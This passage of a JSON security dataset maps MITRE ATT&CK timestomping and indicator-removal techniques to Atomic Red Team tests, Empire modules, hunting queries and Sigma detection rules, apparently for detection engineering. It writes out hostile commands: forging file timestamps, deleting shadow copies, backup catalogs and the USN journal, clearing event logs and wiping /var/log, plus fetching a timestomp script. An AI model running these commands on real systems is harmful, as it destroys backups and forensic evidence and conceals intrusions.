It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + null, + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ] + ] + }, + { + "technique_id": "T1070.006", + "command_list": [ + "touch -a -t 197001010000.00 /opt/filename\n", + "touch -m -t 197001010000.00 /opt/filename\n", + "NOW=$(date)\ndate -s \"1970-01-01 00:00:00\"\ntouch /opt/filename\ndate -s \"$NOW\"\nstat /opt/filename\n", + "touch -acmr #{reference_file_path} /opt/filename\n", + "touch -acmr /bin/sh #{target_file_path}\n", + "Get-ChildItem #{file_path} | % { $_.CreationTime = \"01/01/1970 00:00:00\" }\n", + "Get-ChildItem $env:TEMP\\T1551.006_timestomp.txt | % { $_.CreationTime = \"#{target_date_time}\" }\n", + "Get-ChildItem #{file_path} | % { $_.LastWriteTime = \"01/01/1970 00:00:00\" }\n", + "Get-ChildItem $env:TEMP\\T1551.006_timestomp.txt | % { $_.LastWriteTime = \"#{target_date_time}\" }\n", + "Get-ChildItem #{file_path} | % { $_.LastAccessTime = \"01/01/1970 00:00:00\" }\n", + "Get-ChildItem $env:TEMP\\T1551.006_timestomp.txt | % { $_.LastAccessTime = \"#{target_date_time}\" }\n", + "import-module $env:appdata\\Microsoft\\timestomp.ps1\ntimestomp -dest 
\"$env:appdata\\Microsoft\\kxwn.lock\"\n" + ], + "commands": [ + { + "command": "touch -a -t 197001010000.00 /opt/filename\n", + "source": "atomics/T1070.006/T1070.006.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Timestomp" + }, + { + "command": "touch -m -t 197001010000.00 /opt/filename\n", + "source": "atomics/T1070.006/T1070.006.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Timestomp" + }, + { + "command": "NOW=$(date)\ndate -s \"1970-01-01 00:00:00\"\ntouch /opt/filename\ndate -s \"$NOW\"\nstat /opt/filename\n", + "source": "atomics/T1070.006/T1070.006.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Timestomp" + }, + { + "command": "touch -acmr #{reference_file_path} /opt/filename\n", + "source": "atomics/T1070.006/T1070.006.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Timestomp" + }, + { + "command": "touch -acmr /bin/sh #{target_file_path}\n", + "source": "atomics/T1070.006/T1070.006.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Timestomp" + }, + { + "command": "Get-ChildItem #{file_path} | % { $_.CreationTime = \"01/01/1970 00:00:00\" }\n", + "source": "atomics/T1070.006/T1070.006.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Timestomp" + }, + { + "command": "Get-ChildItem $env:TEMP\\T1551.006_timestomp.txt | % { $_.CreationTime = \"#{target_date_time}\" }\n", + "source": "atomics/T1070.006/T1070.006.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Timestomp" + }, + { + "command": "Get-ChildItem #{file_path} | % { $_.LastWriteTime = \"01/01/1970 00:00:00\" }\n", + "source": "atomics/T1070.006/T1070.006.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Timestomp" + }, + { + "command": "Get-ChildItem $env:TEMP\\T1551.006_timestomp.txt | % { $_.LastWriteTime = \"#{target_date_time}\" }\n", + "source": "atomics/T1070.006/T1070.006.yaml", + "name": "Atomic Red Team Test - Indicator Removal on 
Host: Timestomp" + }, + { + "command": "Get-ChildItem #{file_path} | % { $_.LastAccessTime = \"01/01/1970 00:00:00\" }\n", + "source": "atomics/T1070.006/T1070.006.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Timestomp" + }, + { + "command": "Get-ChildItem $env:TEMP\\T1551.006_timestomp.txt | % { $_.LastAccessTime = \"#{target_date_time}\" }\n", + "source": "atomics/T1070.006/T1070.006.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Timestomp" + }, + { + "command": "import-module $env:appdata\\Microsoft\\timestomp.ps1\ntimestomp -dest \"$env:appdata\\Microsoft\\kxwn.lock\"\n", + "source": "atomics/T1070.006/T1070.006.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Timestomp" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1070.006", + "display_name": "Indicator Removal on Host: Timestomp", + "atomic_tests": [ + { + "name": "Set a file's access timestamp", + "auto_generated_guid": "5f9113d5-ed75-47ed-ba23-ea3573d05810", + "description": "Stomps on the access timestamp of a file\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "target_filename": { + "description": "Path of file that we are going to stomp on last access time", + "type": "Path", + "default": "/opt/filename" + } + }, + "executor": { + "command": "touch -a -t 197001010000.00 #{target_filename}\n", + "name": "sh" + } + }, + { + "name": "Set a file's modification timestamp", + "auto_generated_guid": "20ef1523-8758-4898-b5a2-d026cc3d2c52", + "description": "Stomps on the modification timestamp of a file\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "target_filename": { + "description": "Path of file that we are going to stomp on last access time", + "type": "Path", + "default": "/opt/filename" + } + }, + "executor": { + "command": "touch -m -t 197001010000.00 #{target_filename}\n", + "name": "sh" + } + }, + { + "name": "Set a file's creation timestamp", + 
"auto_generated_guid": "8164a4a6-f99c-4661-ac4f-80f5e4e78d2b", + "description": "Stomps on the create timestamp of a file\n\nSetting the creation timestamp requires changing the system clock and reverting.\nSudo or root privileges are required to change date. Use with caution.\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "target_filename": { + "description": "Path of file that we are going to stomp on last access time", + "type": "Path", + "default": "/opt/filename" + } + }, + "executor": { + "command": "NOW=$(date)\ndate -s \"1970-01-01 00:00:00\"\ntouch #{target_filename}\ndate -s \"$NOW\"\nstat #{target_filename}\n", + "name": "sh" + } + }, + { + "name": "Modify file timestamps using reference file", + "auto_generated_guid": "631ea661-d661-44b0-abdb-7a7f3fc08e50", + "description": "Modifies the `modify` and `access` timestamps using the timestamps of a specified reference file.\n\nThis technique was used by the threat actor Rocke during the compromise of Linux web servers.\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "target_file_path": { + "description": "Path of file to modify timestamps of", + "type": "Path", + "default": "/opt/filename" + }, + "reference_file_path": { + "description": "Path of reference file to read timestamps from", + "type": "Path", + "default": "/bin/sh" + } + }, + "executor": { + "command": "touch -acmr #{reference_file_path} #{target_file_path}\n", + "name": "sh" + } + }, + { + "name": "Windows - Modify file creation timestamp with PowerShell", + "auto_generated_guid": "b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c", + "description": "Modifies the file creation timestamp of a specified file. 
This technique was seen in use by the Stitch RAT.\nTo verify execution, use File Explorer to view the Properties of the file and observe that the Created time is the year 1970.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "target_date_time": { + "description": "Date/time to replace original timestamps with", + "type": "String", + "default": "01/01/1970 00:00:00" + }, + "file_path": { + "description": "Path of file to change creation timestamp", + "type": "Path", + "default": "$env:TEMP\\T1551.006_timestomp.txt" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "A file must exist at the path (#{file_path}) to change the creation time on\n", + "prereq_command": "if (Test-Path #{file_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Path #{file_path} -Force | Out-Null\nSet-Content #{file_path} -Value \"T1551.006 Timestomp\" -Force | Out-Null\n" + } + ], + "executor": { + "command": "Get-ChildItem #{file_path} | % { $_.CreationTime = \"#{target_date_time}\" }\n", + "cleanup_command": "Remove-Item #{file_path} -Force -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Windows - Modify file last modified timestamp with PowerShell", + "auto_generated_guid": "f8f6634d-93e1-4238-8510-f8a90a20dcf2", + "description": "Modifies the file last modified timestamp of a specified file. 
This technique was seen in use by the Stitch RAT.\nTo verify execution, use File Explorer to view the Properties of the file and observe that the Modified time is the year 1970.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "target_date_time": { + "description": "Date/time to replace original timestamps with", + "type": "String", + "default": "01/01/1970 00:00:00" + }, + "file_path": { + "description": "Path of file to change modified timestamp", + "type": "Path", + "default": "$env:TEMP\\T1551.006_timestomp.txt" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "A file must exist at the path (#{file_path}) to change the modified time on\n", + "prereq_command": "if (Test-Path #{file_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Path #{file_path} -Force | Out-Null\nSet-Content #{file_path} -Value \"T1551.006 Timestomp\" -Force | Out-Null\n" + } + ], + "executor": { + "command": "Get-ChildItem #{file_path} | % { $_.LastWriteTime = \"#{target_date_time}\" }\n", + "cleanup_command": "Remove-Item #{file_path} -Force -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Windows - Modify file last access timestamp with PowerShell", + "auto_generated_guid": "da627f63-b9bd-4431-b6f8-c5b44d061a62", + "description": "Modifies the last access timestamp of a specified file. 
This technique was seen in use by the Stitch RAT.\nTo verify execution, use File Explorer to view the Properties of the file and observe that the Accessed time is the year 1970.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "target_date_time": { + "description": "Date/time to replace original timestamps with", + "type": "String", + "default": "01/01/1970 00:00:00" + }, + "file_path": { + "description": "Path of file to change last access timestamp", + "type": "Path", + "default": "$env:TEMP\\T1551.006_timestomp.txt" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "A file must exist at the path (#{file_path}) to change the last access time on\n", + "prereq_command": "if (Test-Path #{file_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Path #{file_path} -Force | Out-Null\nSet-Content #{file_path} -Value \"T1551.006 Timestomp\" -Force | Out-Null\n" + } + ], + "executor": { + "command": "Get-ChildItem #{file_path} | % { $_.LastAccessTime = \"#{target_date_time}\" }\n", + "cleanup_command": "Remove-Item #{file_path} -Force -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Windows - Timestomp a File", + "auto_generated_guid": "d7512c33-3a75-4806-9893-69abc3ccdd43", + "description": "Timestomp kxwn.lock.\n\nSuccessful execution will include the placement of kxwn.lock in #{file_path} and execution of timestomp.ps1 to modify the time of the .lock file. 
\n\n[Mitre ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/4a2ad84e-a93a-4b2e-b1f0-c354d6a41278.yml)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_path": { + "description": "File path for timestomp payload", + "type": "String", + "default": "$env:appdata\\Microsoft" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "timestomp.ps1 must be present in #{file_path}.\n", + "prereq_command": "if (Test-Path #{file_path}\\timestomp.ps1) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://raw.githubusercontent.com/mitre-attack/attack-arsenal/bc0ba1d88d026396939b6816de608cb279bfd489/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1\" -OutFile \"#{file_path}\\timestomp.ps1\"\n" + }, + { + "description": "kxwn.lock must be present in #{file_path}.\n", + "prereq_command": "if (Test-Path -path \"#{file_path}\\kxwn.lock\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Path #{file_path}\\kxwn.lock -ItemType File\n" + } + ], + "executor": { + "command": "import-module #{file_path}\\timestomp.ps1\ntimestomp -dest \"#{file_path}\\kxwn.lock\"\n", + "cleanup_command": "Remove-Item #{file_path}\\timestomp.ps1 -ErrorAction Ignore\nRemove-Item #{file_path}\\kxwn.lock -ErrorAction Ignore", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1070", + "command_list": [ + "fsutil usn deletejournal /D C:\n", + "fsutil.exe usn deletejournal /D", + "vssadmin.exe delete shadows /all /quiet", + "wbadmin.exe delete catalog -quiet", + "wevtutil.exe /cl", + "wmic.exe /NODE:*shadowcopy delete *", + "wevtutilcl", + "wevtutil|cl", + "fsutil|usn|deletejournal", + "fsutilusn|deletejournal", + "powershell/credentials/mimikatz/purge", + "powershell/management/lock", + "powershell/management/logoff", + "powershell/management/restart", + 
"python/persistence/osx/RemoveDaemon", + "```", + "rm -rf /var/log/*" + ], + "commands": [ + { + "command": "fsutil usn deletejournal /D C:\n", + "source": "atomics/T1070/T1070.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host" + }, + { + "command": "fsutil.exe usn deletejournal /D", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "vssadmin.exe delete shadows /all /quiet", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "wbadmin.exe delete catalog -quiet", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "wevtutil.exe /cl", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "wmic.exe /NODE:*shadowcopy delete *", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "wevtutilcl", + "source": "SysmonHunter - Indicator Removal on Host", + "name": "" + }, + { + "command": "wevtutil|cl", + "source": "SysmonHunter - Indicator Removal on Host", + "name": "" + }, + { + "command": "fsutil|usn|deletejournal", + "source": "SysmonHunter - Indicator Removal on Host", + "name": "" + }, + { + "command": "fsutilusn|deletejournal", + "source": "SysmonHunter - Indicator Removal on Host", + "name": "" + }, + { + "command": "powershell/credentials/mimikatz/purge", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/lock", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/logoff", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/restart", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + 
"command": "python/persistence/osx/RemoveDaemon", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "```", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "rm -rf /var/log/*", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1070", + "display_name": "Indicator Removal on Host", + "atomic_tests": [ + { + "name": "Indicator Removal using FSUtil", + "auto_generated_guid": "b4115c7a-0e92-47f0-a61e-17e7218b2435", + "description": "Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. Upon execution, no output\nwill be displayed. More information about fsutil can be found at https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "fsutil usn deletejournal /D C:\n", + "cleanup_command": "fsutil usn createjournal m=1000 a=100 c:\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + }, + { + "chain_id": "100034", + "os": "windows", + "parent_process": "fsutil.exe", + "commandline_string": "usn deletejournal /D", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "indicator_removal", + "mitre_attack": "T1070", + "itw_sample": "https://www.joesecurity.org/reports/report-71b6a493388e7d0b40c83ce903bc6b04.html#overview" + }, + { + "chain_id": "100083", + "os": "windows", + "parent_process": "vssadmin.exe", + "commandline_string": "delete shadows /all /quiet", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + 
"mitre_caption": "indicator_removal", + "mitre_attack": "T1070", + "itw_sample": "51bf86b51ec3a3bf21bc9a9ea7c00f2599efafda93535c2d7e92dd1d07380332" + }, + { + "chain_id": "100084", + "os": "windows", + "parent_process": "wbadmin.exe", + "commandline_string": "delete catalog -quiet", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "indicator_removal", + "mitre_attack": "T1070", + "itw_sample": "" + }, + { + "chain_id": "100085", + "os": "windows", + "parent_process": "wevtutil.exe", + "commandline_string": "/cl", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "indicator_removal", + "mitre_attack": "T1070", + "itw_sample": "https://www.joesecurity.org/reports/report-fbbdc39af1139aebba4da004475e8839.html" + }, + { + "chain_id": "100101", + "os": "windows", + "parent_process": "wmic.exe", + "commandline_string": "/NODE:*shadowcopy delete *", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "indicator_removal", + "mitre_attack": "T1070", + "itw_sample": "" + }, + { + "name": "Indicator Removal on Host", + "description": null, + "level": "high", + "phase": "Defense Evasion", + "query": [ + { + "type": "process", + "process": { + "image": { + "pattern": "wevtutil" + }, + "cmdline": { + "pattern": "cl" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "wevtutil|cl", + "op": "and" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "fsutil|usn|deletejournal", + "op": "and" + } + } + }, + { + "type": "process", + "process": { + "image": { + "pattern": "fsutil" + }, + "cmdline": { + 
"pattern": "usn|deletejournal", + "op": "and" + } + } + } + ] + }, + { + "Empire Module": "powershell/credentials/mimikatz/purge", + "ATT&CK Technique #1": "T1070", + "ATT&CK Technique #2": "", + "Technique": "Indicator Removal on Host", + "Concatenate for Python Dictionary": "\"powershell/credentials/mimikatz/purge\": [\"T1070\"]," + }, + { + "Empire Module": "powershell/management/lock", + "ATT&CK Technique #1": "T1070", + "ATT&CK Technique #2": "", + "Technique": "Indicator Removal on Host", + "Concatenate for Python Dictionary": "\"powershell/management/lock\": [\"T1070\"]," + }, + { + "Empire Module": "powershell/management/logoff", + "ATT&CK Technique #1": "T1070", + "ATT&CK Technique #2": "", + "Technique": "Indicator Removal on Host", + "Concatenate for Python Dictionary": "\"powershell/management/logoff\": [\"T1070\"]," + }, + { + "Empire Module": "powershell/management/restart", + "ATT&CK Technique #1": "T1070", + "ATT&CK Technique #2": "", + "Technique": "Indicator Removal on Host", + "Concatenate for Python Dictionary": "\"powershell/management/restart\": [\"T1070\"]," + }, + { + "Empire Module": "python/persistence/osx/RemoveDaemon", + "ATT&CK Technique #1": "T1070", + "ATT&CK Technique #2": "", + "Technique": "Indicator Removal on Host", + "Concatenate for Python Dictionary": "\"python/persistence/osx/RemoveDaemon\": [\"T1070\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where process_path contains \"wevtutil\"", + "name": "Indicator Removal On Host" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=linux_audit syscall=263 | table host,auid,uid,euid,exe,key", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=linux_audit type=PATH name=*.log nametype=delete", + "name": "" + }, + { + 
"product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "-a always,exit -F arch=b64 -F PATH=/var/log -S unlinkat -F auid>=1000 -F auid!=4294967295 -F key=delete_logs", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=\"bash_history\" rm * .log | table host, user_name, bash_command", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + } + ], + "possible_detections": [ + "auditlogs (audit.rules)", + "bash_history logs", + { + "title": "Disable of ETW Trace", + "id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", + "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", + "references": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", + "https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_mal_lockergoga.yml", + "https://abuse.io/lockergoga.txt" + ], + "author": "@neu5ron, Florian Roth", + "date": "2019/03/22", + "tags": [ + "attack.execution", + "attack.t1070", + "car.2016-04-002" + ], + "level": "high", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection_clear_1": { + "CommandLine": "* cl */Trace*" + }, + "selection_clear_2": { + "CommandLine": "* clear-log */Trace*" + }, + "selection_disable_1": { + "CommandLine": "* sl* /e:false*" + }, + "selection_disable_2": { + "CommandLine": "* set-log* /e:false*" + }, + "condition": "selection_clear_1 or selection_clear_2 or selection_disable_1 or selection_disable_2" + } + }, + { + "title": "Suspicious eventlog clear or configuration using wevtutil", + "id": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", + "description": "Detects clearing or configuration of eventlogs 
uwing wevtutil. Might be used by ransomwares during the attack (seen by NotPetya and others)", + "author": "Ecco", + "date": "2019/09/26", + "tags": [ + "attack.execution", + "attack.t1070", + "car.2016-04-002" + ], + "level": "high", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection_binary_1": { + "Image": "*\\wevtutil.exe" + }, + "selection_binary_2": { + "OriginalFileName": "wevtutil.exe" + }, + "selection_clear_1": { + "CommandLine": "* cl *" + }, + "selection_clear_2": { + "CommandLine": "* clear-log *" + }, + "selection_disable_1": { + "CommandLine": "* sl *" + }, + "selection_disable_2": { + "CommandLine": "* set-log *" + }, + "condition": "(1 of selection_binary_*) and (1 of selection_clear_* or 1 of selection_disable_*)" + }, + "falsepositives": [ + "Admin activity", + "Scripts and administrative tools used in the monitored environment" + ] + }, + { + "title": "Eventlog Cleared", + "id": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", + "description": "One of the Windows Eventlogs has been cleared. e.g. 
caused by \"wevtutil cl\" command execution", + "references": [ + "https://twitter.com/deviouspolack/status/832535435960209408", + "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100" + ], + "author": "Florian Roth", + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "car.2016-04-002" + ], + "logsource": { + "product": "windows", + "service": "system" + }, + "detection": { + "selection": { + "EventID": 104, + "Source": "Microsoft-Windows-Eventlog" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "medium" + }, + { + "title": "Security Eventlog Cleared", + "id": "f2f01843-e7b8-4f95-a35a-d23584476423", + "description": "Some threat groups tend to delete the local 'Security' Eventlog using certain utitlities", + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "car.2016-04-002" + ], + "author": "Florian Roth", + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": [ + 517, + 1102 + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" + ], + "level": "high" + }, + [ + "4663", + "File monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + 
"target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "process", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
